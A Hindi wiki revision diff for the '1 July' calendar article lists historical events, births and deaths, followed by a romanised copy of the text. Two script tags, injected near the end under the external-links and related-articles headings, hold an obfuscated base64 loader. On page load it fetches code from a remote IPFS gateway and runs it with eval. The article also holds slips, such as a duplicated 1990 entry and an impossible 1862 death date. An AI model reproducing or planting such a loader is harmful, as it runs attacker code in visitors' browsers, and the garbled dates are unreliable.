Difference between revisions of "1 जुलाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(22 intermediate revisions by 6 users not shown)
Line 1: Line 1:
{{कैलंडर}}
 
 
 
[[ग्रेगोरी कैलंडर]] के अनुसार 1 जुलाई [[वर्ष]] का 182 वाँ ([[लीप वर्ष]] में यह 183 वाँ) दिन है। साल में अभी और 183 दिन शेष हैं।
 
[[ग्रेगोरी कैलंडर]] के अनुसार 1 जुलाई [[वर्ष]] का 182 वाँ ([[लीप वर्ष]] में यह 183 वाँ) दिन है। साल में अभी और 183 दिन शेष हैं।
  
 
==1 जुलाई की महत्त्वपूर्ण घटनाएँ==
 
==1 जुलाई की महत्त्वपूर्ण घटनाएँ==
* 1852 - 1 जुलाई, 1852 को [[सिंध प्रांत|सिन्ध]] के मुख्य आयुक्त सर बर्टलेफ्रोरे द्वारा सिर्फ़ सिंध राज्य में और [[मुंबई]] [[कराची]] मार्ग पर प्रयोग के लिए ' सिंध डाक (Scinde Dawk)' नामक [[डाक टिकट]] जारी किया गया।
+
* [[1949]] - जब स्‍वतंत्र भारत में छोटी रियासतों का विलय हुआ तब त्रावनकोर तथा कोचीन रियासतों को मिलाकर [[1 जुलाई]], [[1949]] को त्रावनकोर-[[कोचीन]] राज्य बना दिया गया, किंतु [[मालाबार]] [[मद्रास|मद्रास प्रांत]] के अधीन रहा।
 +
* 1852 - 1 जुलाई, 1852 को [[सिंध प्रांत|सिन्ध]] के मुख्य आयुक्त सर बर्टलेफ्रोरे द्वारा सिर्फ़ सिंध राज्य में और [[मुंबई]] [[कराची]] मार्ग पर प्रयोग के लिए ' सिंध डाक (Scinde Dawk)' नामक [[डाक टिकट]] जारी किया गया।
 
* [[1965]] - 1 जुलाई को [[भारत]] और [[पाकिस्तान]] के बीच युद्ध विराम लागू हुआ और विवाद को एक अंतर्राष्ट्रीय न्यायाधिकरण के समक्ष मध्यस्थता के लिए प्रस्तुत किया गया। इस न्यायाधिकरण के फैसले में 1968 में प्रकाशित, 9/10 हिस्सा भारत को और शेष 1/10 हिस्से का अधिकार पाकिस्तान को दिया गया।
 
* [[1965]] - 1 जुलाई को [[भारत]] और [[पाकिस्तान]] के बीच युद्ध विराम लागू हुआ और विवाद को एक अंतर्राष्ट्रीय न्यायाधिकरण के समक्ष मध्यस्थता के लिए प्रस्तुत किया गया। इस न्यायाधिकरण के फैसले में 1968 में प्रकाशित, 9/10 हिस्सा भारत को और शेष 1/10 हिस्से का अधिकार पाकिस्तान को दिया गया।
 +
*[[1960]] - [[घाना]] [[अफ़्रीका]] का एक प्रजातंत्र राज्य है, जिसे 1 जुलाई को गणराज्य घोषित किया गया था।
 +
* [[1990]] - पूर्वी एवं पश्चिमी जर्मनी के बीच सीमा रेखा की समाप्ति एवं पश्चिमी जर्मनी की मुद्रा को पूर्वी जर्मनी में मान्यता।
 
* [[1990]] - पूर्वी एवं पश्चिमी जर्मनी के बीच सीमा रेखा की समाप्ति एवं पश्चिमी जर्मनी की मुद्रा को पूर्वी जर्मनी में मान्यता।  
 
* [[1990]] - पूर्वी एवं पश्चिमी जर्मनी के बीच सीमा रेखा की समाप्ति एवं पश्चिमी जर्मनी की मुद्रा को पूर्वी जर्मनी में मान्यता।  
 
* [[1991]] - बारसा संधि भंग की गयी।  
 
* [[1991]] - बारसा संधि भंग की गयी।  
Line 16: Line 17:
 
* [[2004]] - आसियान ने अंतर्राष्ट्रीय आतंकवाद से निपटने हेतु आस्ट्रेलिया से समझौता किया।  
 
* [[2004]] - आसियान ने अंतर्राष्ट्रीय आतंकवाद से निपटने हेतु आस्ट्रेलिया से समझौता किया।  
 
* [[2006]] - अमेरिकी संसद की समितियों ने भारत-अमेरिकी परमाणु समझौते को मंजूरी प्रदान की। एशियाई युवा शतरंज चैम्पियनशिप में भारत ने 8 स्वर्ण जीते। चीन में बर्ड फ़्लू के विषाणु की पुष्टि। ईराक में अलकायदा के वांछित नेता अबू अमूब अल मसरी पर [[अमेरिका]] ने 50 लाख डालर का इनाम रखा। [[जापान]] के पूर्व प्रधानमंत्री 68 वर्षीय रियूतारो हाशीमातो का निधन।  
 
* [[2006]] - अमेरिकी संसद की समितियों ने भारत-अमेरिकी परमाणु समझौते को मंजूरी प्रदान की। एशियाई युवा शतरंज चैम्पियनशिप में भारत ने 8 स्वर्ण जीते। चीन में बर्ड फ़्लू के विषाणु की पुष्टि। ईराक में अलकायदा के वांछित नेता अबू अमूब अल मसरी पर [[अमेरिका]] ने 50 लाख डालर का इनाम रखा। [[जापान]] के पूर्व प्रधानमंत्री 68 वर्षीय रियूतारो हाशीमातो का निधन।  
 +
* [[2006]] - 1 जुलाई, को [[परिमार्जन नेगी|परिमार्जन]] आज तक के सबसे कम उम्र के दूसरे ग्रैंडमास्टर बने।
 
* [[2007]] - दलाईलामा के मुद्दे पर चीन के अधिकारियों के साथ तिब्बत के दूतों की वार्ता प्रारम्भ।  
 
* [[2007]] - दलाईलामा के मुद्दे पर चीन के अधिकारियों के साथ तिब्बत के दूतों की वार्ता प्रारम्भ।  
* [[2008]] - गाजापट्टी के फलस्तीनी विद्रोहियों ने दक्षिणी इस्रायल पर रॉकेट दागा।  
+
* [[2008]] - गाजापट्टी के फलस्तीनी विद्रोहियों ने दक्षिणी इस्रायल पर रॉकेट दागा।
 +
* [[2017]]-  [[भारत]] में अर्थव्यवस्था के एक महत्वपूर्ण सुधार के रूप में वस्तु एवं सेवा कर (जीएसटी) लागू किया गया।
 +
 
 
==1 जुलाई को जन्मे व्यक्ति==
 
==1 जुलाई को जन्मे व्यक्ति==
* [[1882]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।  
+
* [[1882]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।
* [[1927]] - [[चन्द्रशेखर सिंह]] - [[भारत]] के 11 वें [[प्रधानमंत्री]]।
+
* [[1889]] - [[बेनेगल रामा राव]] - [[भारतीय रिज़र्व बैंक]] के चौथे गवर्नर थे।
* [[1928]] - [[रामनरेश यादव]] - [[उत्तर प्रदेश]] के पूर्व [[मुख्यमंत्री]] तथा [[मध्य प्रदेश]] के [[राज्यपाल]]।
+
* [[1925]] - [[अमरकांत]] - भारत के प्रसिद्ध हिन्दी कथा साहित्यकार
 +
* [[1927]] - [[चन्द्रशेखर|चन्द्रशेखर सिंह]] - [[भारत]] के 8वें [[प्रधानमंत्री]]।
 +
* [[1927]] - [[सुधाकर पाण्डेय]] - [[हिन्दी साहित्य]] की प्रमुख विधाओं के उत्कृष्ठ लेखक और सुधारक।
 +
* [[1928]] - [[राम नरेश यादव]] - [[उत्तर प्रदेश]] के पूर्व [[मुख्यमंत्री]] तथा [[मध्य प्रदेश]] के [[राज्यपाल]]।
 +
* [[1933]] - [[अब्दुल हमीद]]- [[परमवीर चक्र]] विजेता भारतीय सैनिक
 
* [[1933]] - [[कन्हैयालाल नंदन]] - वरिष्ठ पत्रकार और साहित्यकार।
 
* [[1933]] - [[कन्हैयालाल नंदन]] - वरिष्ठ पत्रकार और साहित्यकार।
 
* [[1938]] - [[हरिप्रसाद चौरसिया]] - [[बाँसुरी वादक]] और संगीतकार
 
* [[1938]] - [[हरिप्रसाद चौरसिया]] - [[बाँसुरी वादक]] और संगीतकार
 +
* [[1973]] - [[अखिलेश यादव]] -  [[समाजवादी पार्टी]] के [[मुलायम सिंह यादव]] के पुत्र।
 +
* [[1966]] - [[राशिद ख़ान|उस्ताद राशिद ख़ान]], प्रसिद्ध भारतीय शासत्रीय गायक एवं संगीतकार।
 +
* [[1949]] - [[वेंकैया नायडू]] - प्रसिद्ध राजनीतिज्ञ एवं [[भारतीय जनता पार्टी]] के भूतपूर्व राष्ट्रीय अध्यक्ष।
 +
* [[1949]] - [[डॉ. तुलसीराम]] - दलित लेखन में अपना एक अलग स्थान रखने वाले साहित्यकार थे।
 +
* [[1952]] - [[गोपाल भार्गव]] - [[मध्य प्रदेश]] सरकार में 'पंचायत एवं ग्रामीण विकास मंत्री'।
 +
* [[1935]] - [[जयपाल सिंह कश्यप]] - वाणिज्य स्नातक, विधि स्नातक, सातवीं लोकसभा के सदस्य।
 +
* [[1943]] - [[गुफरान आज़म]] - सातवीं लोकसभा के सदस्य चुने गये।
 +
* [[1915]] - [[गुयेन वैन लिंह]] - वियतनाम की कम्युनिस्ट पार्टी के महासचिव थे।
  
 
==1 जुलाई को हुए निधन==
 
==1 जुलाई को हुए निधन==
 +
* [[1999]] - [[आबिद ख़ान]] - [[भारतीय सेना]] के जांबाज सैनिकों में से एक थे, जिन्होंने मातृभूमि की रक्षा के लिए अपने प्राणों की आहूति दी।
 +
* [[1962]] - [[पुरुषोत्तम दास टंडन]] - [[आधुनिक भारत]] के प्रमुख स्वाधीनता सेनानियों में से एक।
 +
* [[1941]] - [[सी. वाई. चिन्तामणि]] - स्वतंत्रता पूर्व [[भारत]] के प्रतिष्ठित संपादकों तथा उदारवादी दल के संस्थापकों में से एक।
 +
* [[1936]] - [[वनलता दास गुप्ता]] - [[ज्योतिकणा दत्त]] की सहपाठिनी, सक्रिय क्रांतिकारी कार्यकर्ता थीं। क्रांतिकारीयों को हथियार उपलब्ध कराने का कार्य करतीं थीं।
 
* [[1862]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।
 
* [[1862]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।
  
 
==1 जुलाई के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==1 जुलाई के महत्त्वपूर्ण अवसर एवं उत्सव==
* डॉक्टर दिवस (डॉक्टर विधान चंद्र राय जन्म दिवस)
+
* [[राष्ट्रीय चिकित्सक दिवस]] (डॉक्टर विधान चंद्र राय जन्म दिवस)
 
* [[भारतीय स्टेट बैंक स्थापना दिवस]]
 
* [[भारतीय स्टेट बैंक स्थापना दिवस]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 38: Line 58:
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__
 +
 +
[[Category:कैलंडर]]

Revision as of 07:25, 26 July 2018

gregori kailandar ke anusar 1 julaee varsh ka 182 vaan (lip varsh mean yah 183 vaan) din hai. sal mean abhi aur 183 din shesh haian.

1 julaee ki mahattvapoorn ghatanaean

  • 1949 - jab sh‍vatantr bharat mean chhoti riyasatoan ka vilay hua tab travanakor tatha kochin riyasatoan ko milakar 1 julaee, 1949 ko travanakor-kochin rajy bana diya gaya, kiantu malabar madras praant ke adhin raha.
  • 1852 - 1 julaee, 1852 ko sindh ke mukhy ayukt sar bartalephrore dvara sirf siandh rajy mean aur muanbee karachi marg par prayog ke lie ' siandh dak (Scinde Dawk)' namak dak tikat jari kiya gaya.
  • 1965 - 1 julaee ko bharat aur pakistan ke bich yuddh viram lagoo hua aur vivad ko ek aantarrashtriy nyayadhikaran ke samaksh madhyasthata ke lie prastut kiya gaya. is nyayadhikaran ke phaisale mean 1968 mean prakashit, 9/10 hissa bharat ko aur shesh 1/10 hisse ka adhikar pakistan ko diya gaya.
  • 1960 - ghana afrika ka ek prajatantr rajy hai, jise 1 julaee ko ganarajy ghoshit kiya gaya tha.
  • 1990 - poorvi evan pashchimi jarmani ke bich sima rekha ki samapti evan pashchimi jarmani ki mudra ko poorvi jarmani mean manyata.
  • 1990 - poorvi evan pashchimi jarmani ke bich sima rekha ki samapti evan pashchimi jarmani ki mudra ko poorvi jarmani mean manyata.
  • 1991 - barasa sandhi bhang ki gayi.
  • 1994 - roman harjog dvara jarmani ke naye rashtrapati ke roop mean shapath grahan, vishv kap futabal mean atmaghati gol karane vale kolanbiyaee khila di aandres eskobar ki apane desh mean hatya.
  • 1995 - san.ra. amerika ne taeevan ke khilaf lagaye gaye pratibandh ko hataya.
  • 1996 - astreliya ke uttari praant mean svechchha mrityu qanoon vishv mean pahali bar lagoo.
  • 1997 - british upanivesh haangakaang chin ko supurd.
  • 2000 - lards ke 100vean aitihasik test maich mean ianglaiand ne vestiandij ko haraya.
  • 2003 - samudr mean sabase gaharaee tak jakar vishv kirtiman banane vali japani panadubbi prashaant mahasagar mean lapata.
  • 2004 - asiyan ne aantarrashtriy atankavad se nipatane hetu astreliya se samajhauta kiya.
  • 2006 - ameriki sansad ki samitiyoan ne bharat-ameriki paramanu samajhaute ko manjoori pradan ki. eshiyaee yuva shataranj chaimpiyanaship mean bharat ne 8 svarn jite. chin mean bard floo ke vishanu ki pushti. eerak mean alakayada ke vaanchhit neta aboo amoob al masari par amerika ne 50 lakh dalar ka inam rakha. japan ke poorv pradhanamantri 68 varshiy riyootaro hashimato ka nidhan.
  • 2006 - 1 julaee, ko parimarjan aj tak ke sabase kam umr ke doosare graiandamastar bane.
  • 2007 - dalaeelama ke mudde par chin ke adhikariyoan ke sath tibbat ke dootoan ki varta prarambh.
  • 2008 - gajapatti ke phalastini vidrohiyoan ne dakshini israyal par r aauket daga.
  • 2017- bharat mean arthavyavastha ke ek mahatvapoorn sudhar ke roop mean vastu evan seva kar (jiesati) lagoo kiya gaya.

1 julaee ko janme vyakti

1 julaee ko hue nidhan

1 julaee ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>